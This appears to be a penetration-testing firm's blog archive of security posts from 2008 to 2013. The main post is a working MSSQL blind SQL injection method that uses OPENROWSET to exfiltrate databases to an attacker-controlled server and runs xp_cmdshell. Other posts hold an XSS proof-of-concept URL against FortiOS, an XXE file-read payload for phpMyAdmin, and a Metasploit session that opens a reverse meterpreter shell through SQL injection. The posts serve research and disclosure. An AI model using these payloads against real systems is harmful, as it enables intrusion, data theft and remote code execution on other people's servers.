Blog ■

Stacked based MSSQL blind injection bypass methodology

Monday, January 7th, 2013

If you have a blind SQL injection you are already in a good position. Exploitation however, depending on the type of the blind SQL injection, can take time.

This post is part of a methodology used for obtaining *sight* from a stacked based blind SQL injection.

Requirements:

1. Stacked based Blind SQL injection
2. Local MSSQL database server (MSSQL server express was used in this example)
3. Improper remote firewall configuration (allows outbound connections)
4. #include <brain.h>

If all of the requirements above are met then the following technique can be used:

• On the local server create a new database with a table to store the results:
  • CREATE DATABASE output_db;
  • CREATE TABLE output_db..output ( result VARCHAR(MAX) );
  • Lastly, open the ports and change the config for remotely connecting to the database.
• On the remote server test for OPENROWSET  and external connection:
  • ; INSERT INTO OPENROWSET(’SQLOLEDB’,’server=LOCAL_SERVER_IP;
    uid=LOCAL_SERVER_USERNAME;pwd=LOCAL_SERVER_USER_PASS‘,
    output_db..output) SELECT @@version’)–

This instructs the remote database server to connect to the local database and write the result of the SELECT @@version command. If “SELECT * from output_db..output” returns any results then you are in luck otherwise continue using sqlmap…

Now we can change the “SELECT @@version” part to run any command we want and the results are going to get saved our database.

NOTE:  OPENROWSET needs the destination table to have the same columns as the ones returned by the remote command ans *similar* types to avoid any errors

Copying Databases:

• After you create a new database make a copy of the local sysdatabases and empty it:
  • SELECT TOP 0 * INTO master_copy..sysdatabases from master..sysdatabases;
  • DELETE master_copy..sysdatabases;

• Copy the Remote sysobjects over to master_copy..sysdatabases;
  • ; INSERT INTO OPENROWSET(’SQLOLEDB’,’server=LOCAL_SERVER_IP;
    uid=LOCAL_SERVER_USERNAME;pwd=LOCAL_SERVER_USER_PASS‘,
    master_copy..sysdatabases;) SELECT * FROM master..sysdatabases;–

• For every returned name create a new database and list tables
  • CREATE DATABASE LOCAL_DB_NAME;
  • CREATE TABLE LOCAL_DB_NAME..tables( names VARCHAR(MAX) );
  • ; INSERT INTO OPENROWSET(’SQLOLEDB’,’server=LOCAL_SERVER_IP;
    uid=LOCAL_SERVER_USERNAME;pwd=LOCAL_SERVER_USER_PASS‘,
    LOCAL_DB_NAME..tables;) SELECT name FROM REMOTE_DB_NAME..sysobjects WHERE xtype = ‘U’;–

• For every returned table create a new table for to hold the column data
  • CREATE TABLE LOCAL_DB_NAME..columns ( name VARCHAR(MAX), type VARCHAR(MAX) );
  • ; INSERT INTO OPENROWSET(’SQLOLEDB’,’server=localhost;uid=sa;pwd=sa’,
    LOCAL_DB_NAME.dbo.columns) SELECT REMOTE_DB_NAME..syscolumns.name,
    TYPE_NAME(REMOTE_DB_NAME..syscolumns.xtype) FROM
    REMOTE_DB_NAME..syscolumns, REMOTE_DB_NAME..sysobjects WHERE
    REMOTE_DB_NAME..syscolumns.id=REMOTE_DB_NAME..sysobjects.id AND
    REMOTE_DB_NAME..sysobjects.name=’sysobj’;

• Now create a new table with the same columns and data types and copy using the same command as above
  • ; INSERT INTO OPENROWSET(’SQLOLEDB’,’server=LOCAL_SERVER_IP;
    uid=LOCAL_SERVER_USERNAME;pwd=LOCAL_SERVER_USER_PASS‘,
    LOCAL_DB_NAME..TABLE;) SELECT * FROM REMOTE_DB_NAME..TABLE;–
  • Or create a new table with only the columns you need and copy over only those

Advancing:

• Bruteforcing the sa password for command execution is possible with double OPENROWSET. The first OPENROWSET is the connection back to our database, the second OPENROWSET instructs the remote DB to connect to itself as sa run “SELECT @@version” and return the result to us.
  • ; INSERT INTO OPENROWSET(’SQLOLEDB’,’server=LOCAL_SERVER_IP;
    uid=LOCAL_SERVER_USERNAME;pwd=LOCAL_SERVER_USER_PASS‘,
    output_db..output)
    SELECT * FROM OPENROWSET(’SQLNCLI’,’server=localhost;uid=sa;pwd=PASSWORD‘,’SELECT @@version’)
• Command execution with output of the results (if the sa password is known)
• ; INSERT INTO OPENROWSET(’SQLOLEDB’,’server=LOCAL_SERVER_IP;
  uid=LOCAL_SERVER_USERNAME;pwd=LOCAL_SERVER_USER_PASS‘,
  output_db..output)
  SELECT * FROM OPENROWSET(’SQLNCLI’,’server=localhost;uid=sa;pwd=PASSWORD‘,
  ’set fmtonly off; exec master..xp_cmdshell ”dir” ; ‘)–

Tags: blind, bypass, mssql, sql, stacked queries
Posted in Penetration Testing, SQL Server, Security research, Vulnerabilities, exploit, sql injection | No Comments »

FortiOS Remote Access Web Portal - XSS Vulnerability

Monday, November 5th, 2012

Overview:

Fortinet delivers a comprehensive portfolio of security gateways and complementary products. FortiGate platforms integrate the FortiOS™ operating system with FortiASIC™ processors and the latest-generation CPUs to provide comprehensive, high-performance security. By using a specially crafted URL in an HTTP request, it is possible to achieve an XSS attack, potentially giving access to confidential information, such as session cookies.

Description:

Fortinet FortiOS contains a flaw that allows a non-persistent cross-site scripting (XSS) attack. The input passed to redir parameter at http://x.x.x.x/remote/logincheck is not properly sanitized. It is possible to inject the redir parameter in a POST request as a data parameter or trough a GET request as a URL parameter. This may allow an attacker to execute arbitrary script code in a user’s browser.

As this range of products are used for SSL VPN authentication, this issue can be exploited to mount an attack and potentially gain unauthorised access to the target internal network.

Affected Products:

Found and tested on: SSLVPN-FGT200B  Remote Access Web Portal, but its known not to be the only one affected.

Proof of Concept:

https://x.x.x.x/remote/logincheck?magic=&username=&redir=“};alert(’XSS’);{”&grpid=&code2=&credential2=&code=&just_logged_in=1&reqid=0&cre

Figure 1: Example XSS on a SSLVPN-FGT200B

Source Code Result:

<script language = “javascript”> function redir() { top.location=”“};alert(’XSS’);{”“; } </script>

Solution:

The vendor has released an update of FortiOS. Version FortiOS 4.3.7 fixes this issue.

History:

Discovered: 14/03/2012 (Marco Batista)
Vendor Notified: 18/04/2012
Disclosed: 02/11/2012

Tags: cross site scripting, Fortinet, ssl vpn, XSS
Posted in Penetration Testing, Phishing, Vulnerabilities, exploit | No Comments »

CVE-2011-4107 PoC - phpMyAdmin Local File Inclusion via XXE injection

Thursday, January 12th, 2012

An interesting local file inclusion vulnerability has been recently published. An XXE (XML eXternal Entity) injection attack, which affects phpMyAdmin 3.4.x previous to 3.4.7.1 and 3.3.x previous to 3.3.10.5. - CVE-2011-4107

The issue is located in the libraries\import\xml.php file, where the simplexml_load_string() function is called without validating the existence of a reference to an external entity on the file:

$xml = simplexml_load_string($buffer, “SimpleXMLElement”, LIBXML_COMPACT);

Patched versions make use of the libxml_disable_entity_loader() PHP function before loading the XML document, in order to prevent the injection. libxml_disable_entity_loader() function disables the ability to load external entities.

phpMyAdmin offers the functionality of importing a database from a user-specified XML file. In vulnerable versions importing a specially-crafted XML file which contains an external XML entity permits an authenticated attacker to retrieve a local file from the server or network (limited by the privileges of the user running the web server).

It is well understood that the LOAD_FILE MySQL function could be used to gain read access to files in the database file system, however there are configurations where phpMyAdmin is installed on a different host than the database and therefore exploitation of this issue could become handy in penetration testing engagements.

SECFORCE has developed a metasploit module to assist the exploitation of this vulnerability. It is available for download from our security tools section on our website.

This module automates the process of local file inclusion in the following way:

1. Logging in into phpMyAdmin using provided credentials.
2. Crafting an XML using XXE with the given file to read.
3. Uploading the XML
4. Retrieving the file from the server or network (restricted by the privileges of the user running the web server ).

The module has the options shown in the following screenshot:

An example of a successful run of the module is presented in the screenshot below:

Example of successfully reading a file

Defining XML external entity (XXE) injection attack as part of XML injection vulnerability:

XML injection

XML Injection is when is is possible to change the values of an XML document and the XML parser fails to make an appropriate data validation this way making the injection possible.

XML external entity injection attack (XXE)

“External Entity: The set of valid entities can be extended by defining new entities. If the definition of an entity is a URI, the entity is called an external entity. Unless configured to do otherwise, external entities force the XML parser to access the resource specified by the URI, e.g., a file on the local machine or on a remote systems. This behavior exposes the application to XML eXternal Entity (XXE) attacks, which can be used to perform denial of service of the local system, gain unauthorized access to files on the local machine, scan remote machines, and perform denial of service of remote systems.” - (OWASP-DV-008)

XXE Example:

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>

phpMyAdmin has released patched versions available for download from here.

Tags: CVE-2011-4107, Local file inclusion, phpMyAdmin, PoC, XEE injection
Posted in Penetration Testing, Security research, Vulnerabilities, exploit | No Comments »

CVE-2011-3368 PoC - Apache Proxy Scanner

Monday, October 10th, 2011

A recent Apache vulnerability has been made public whereby an attacker could gain unauthorised access to content in the DMZ network:

The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.

SECFORCE has developed a proof of concept for this vulnerability, available for download from our security tools section on our website. The script exploits the vulnerability and allows the user to retrieve arbitrary known files from the DMZ. The tool can also be used to perform a port scan of the web server using the Apache proxy functionality, and therefore bypassing any firewall.

The following output shows the usage of the tool:

python apache_proxy_scanner.py
CVE-2011-3368 proof of concept by Rodrigo Marcos
http://www.secforce.co.uk
usage():
python apache_scan.py [options]
 [options]
    -r: Remote Apache host
    -p: Remote Apache port (default is 80)
    -u: URL on the remote web server (default is /)
    -d: Host in the DMZ (default is 127.0.0.1)
    -e: Port in the DMZ (enables 'single port scan')
    -g: GET request to the host in the DMZ (default is /)
    -h: Help page
examples:
 - Port scan of the remote host
    python apache_scan.py -r www.example.com -u /img/test.gif
 - Port scan of a host in the DMZ
    python apache_scan.py -r www.example.com -u /img/test.gif
	-d internalhost.local
- Retrieve a resource from a host in the DMZ
    python apache_scan.py -r www.example.com -u /img/test.gif
	-d internalhost.local -e 80 -g /accounts/index.html

The tool can be used to perform a portscan of the target host in the following way:

python apache_proxy_scanner.py -r <target> -u <uri>

The following screenshot shows the result of the command above:

Apache proxy port scan results

The script can be used to perform a bounce scan of a host in the DMZ or in the Internet:

python apache_proxy_scanner.py -r 192.168.85.161
	-u /rewrite/test -d internalhost

python apache_proxy_scanner.py -r 192.168.85.161
	-u /rewrite/test -d www.example.com

Apache_proxy_scanner will report open/filtered/closed ports in internal and external hosts.

Tags: Apache, apache_proxy_scanner, CVE-2011-3368, mod_proxy, mod_rewrite, Penetration Testing, PoC, SECFORCE
Posted in Penetration Testing, Tools, Vulnerabilities | No Comments »

Exploiting SQL injection vulnerabilities with Metasploit

Thursday, January 27th, 2011

In this post we are going to show how to exploit a SQL injection vulnerability on a web application using Microsoft SQL server backend where xp_cmdshell is available to the attacker.

Given a penetration test to a web application it is identified that it is vulnerable to SQL injection attacks and the penetration tester can execute administrative stored procedures:

http://192.168.1.66/showproduct.asp?id=1;exec master..xp_cmdshell ‘ping 192.168.1.64′;–

If the request shown above is successful then arbitrary commands could be executed in the host. At this point, there are a number of options that would allow the tester to fully compromise the server. There are public tools which could aid the attacker to automate the take over process. This post will cover the use of a Metasploit module.

The mssql_payload_sqli module will execute any Windows payload on the target host. In this example we will execute meterpreter which is one of the payloads that offers great flexibility to the penetration tester.

It is necessary to specify the exact point where the SQL injection vulnerability is. We do that by entering the GET_PATH variable with an [SQLi] token. The token will be the place where the payload will be executed. The rest of the exploitation process is the same as any other vulnerability, this is the exploitation based on the URL shown above:

msf > use windows/mssql/mssql_payload_sqli

msf exploit(mssql_payload_sqli) >

 set GET_PATH http://192.168.1.66/
 showproduct.asp?id=1;[SQLi];--

GET_PATH => http://192.168.1.66/
 showproduct.asp?id=1;[SQLi];--

msf exploit(mssql_payload_sqli) > set RHOST 192.168.1.66

RHOST => 192.168.1.66

msf exploit(mssql_payload_sqli) >

 set PAYLOAD windows/patchupmeterpreter/reverse_tcp

PAYLOAD => windows/patchupmeterpreter/reverse_tcp

msf exploit(mssql_payload_sqli) > set LHOST 192.168.1.64

LHOST => 192.168.1.64

msf exploit(mssql_payload_sqli) > set LPORT 80

LPORT => 80

msf exploit(mssql_payload_sqli) > exploit

After the exploitation the attacker will get a meterpreter shell.

SQL injection exploitation with Metasploit

If you want to use this code you can download it from Secforce security tools repository.

Tags: exploitation, metasploit, ms sql server, Penetration Testing, sql injection
Posted in Penetration Testing, SECFORCE, SQL Server, Tools, Vulnerabilities, exploit, sql injection | No Comments »

MS vulnerabilities and worms

Friday, October 24th, 2008

Time between vulnerability disclosure and worm spread has been drastically reduced.

The MS08-067 vulnerability has been published some hours ago. Microsoft rated this vulnerability as critical, as a remote unauthenticated attacker could exploit it to execute arbitrary code in the vulnerable host.

This vulnerability is caused due to a bug in the Windows Server service handling a crafted RPC request.

The vulnerability affects almost all the Windows operating systems family, with some differences. On Windows 2000, XP and 2003 an attacker could exploit this vulnerability without the need of a username and password. However, the exploitation in Windows Vista and Windows Server 2008 requires a valid username and password.

The really interesting thing about all of this is that Microsoft published the following in its Security Bulleting:

It is possible that this vulnerability could be used in the crafting of a wormable exploit.

Just after a few hours reliable exploits are already available and what is more, a worm has been already found in the wild exploting this vulnerability.

The name of the worm is Gimmiv.A and uses this vulnerability to spread over the network. On infection, the worm injects two DLLs into the services.exe address space. After that, the worm retrieves information from the compromised host (including passwords from the Windows protected storage) and posts it in encrypted form to a remote host.

The worm posts the details to a number of hosts, including http://perlbody.t35.com/

At the time of writing the host is up and running and contains details of 3779 hosts stored int the http://perlbody.t35.com/icon.txt file.

The worm also downloads the following image stored on the http://perlbody.t35.com/ server:

Microsoft and SECFORCE recommends that customers apply the update immediately as other versions of worms exploiting this vulnerability are likely to be released.

Tags: exploitation, Gimmiv.A, MS08-067, worms
Posted in Vulnerabilities | 1 Comment »

SCADA Security

Friday, October 10th, 2008

It is interesting to see how security research is a kind of a living being. Almost by nature security rearchers focus their efforts in whatever is more familiar to them, resulting in a vast amount of time dedicated to fairly accessible products such as Microsoft Windows operating systems, MS Office, Linux in its different flavours, etc.

This leaves a gap in the security industry where highly deployed systems (sometimes critical for government infrastructure) remain untested and its security is several years behind the avarage IT system.

Two clear examples of this are MPLS and SCADA systems. Given the fact that these systems are rarely found in penetration testing engagements and independent researchers struggle to find a suitable environment for testing, it doesn’t come to a surprise their security doesn’t match nowadays avarage.

Last week there was two vulnerabilities affecting SCADA systems:

• DATAC RealWin Preauth remote vulnerability, whereby a remote attacker can execute arbitrary code on the affected system.
• ABB PCU400 buffer overflow, whereby remote execution of arbitraty code is possible.

In a world where stack buffer overflows are among species threatened with extinction it is rather suprising reading this kind of vulnerabilities. There is no doubt that due to a number of circunstances security research has been appart from these technologies.

Tags: datac realwin, mpls, pcu400, Penetration Testing, scada, security, Vulnerabilities
Posted in Vulnerabilities | No Comments »

WordPress SQL column truncation vulnerability

Wednesday, October 8th, 2008

This vulnerability has been published some days ago where an attacker could create a duplicated “admin” user and recover the legitimate “admin” password. SQL column truncation is an attacking technique whereby an attacker take advance of some kind of mismatch between an application and the database structure used by it.

Let’s have a look to the vulnerable code.

In schema.php in the wordpress application it is defined the creation of the database table containing users:

CREATE TABLE $wpdb->users (
ID bigint(20) unsigned NOT NULL auto_increment,
user_login varchar(60) NOT NULL default '',

As we can see, the user_login field has a length of 60 bytes. However, the application does not enforce this limitation and allows longer usernames.

An attacker could create a user called “admin[55 spaces]X”. The last “X” is character 61 and therefore will be ignored by the database.

Later in the code, we can see that the user_login field is trim()ed and all the spaces are removed, so it becomes “admin”:

if ( strstr($_POST['user_login'], ‘@’) ) {
$user_data = get_user_by_email(trim($_POST['user_login']));
if ( empty($user_data) )
$errors->add(’invalid_email’, __(’ERROR: There is no user registered with that email address.’));
} else {
$login = trim($_POST['user_login']);
$user_data = get_userdatabylogin($login);
}

In summary, this is a very creative vulnerability and an interesting vector of attack.

Tags: SQL column truncation, vulnerability, wordpress
Posted in Penetration Testing, Vulnerabilities | No Comments »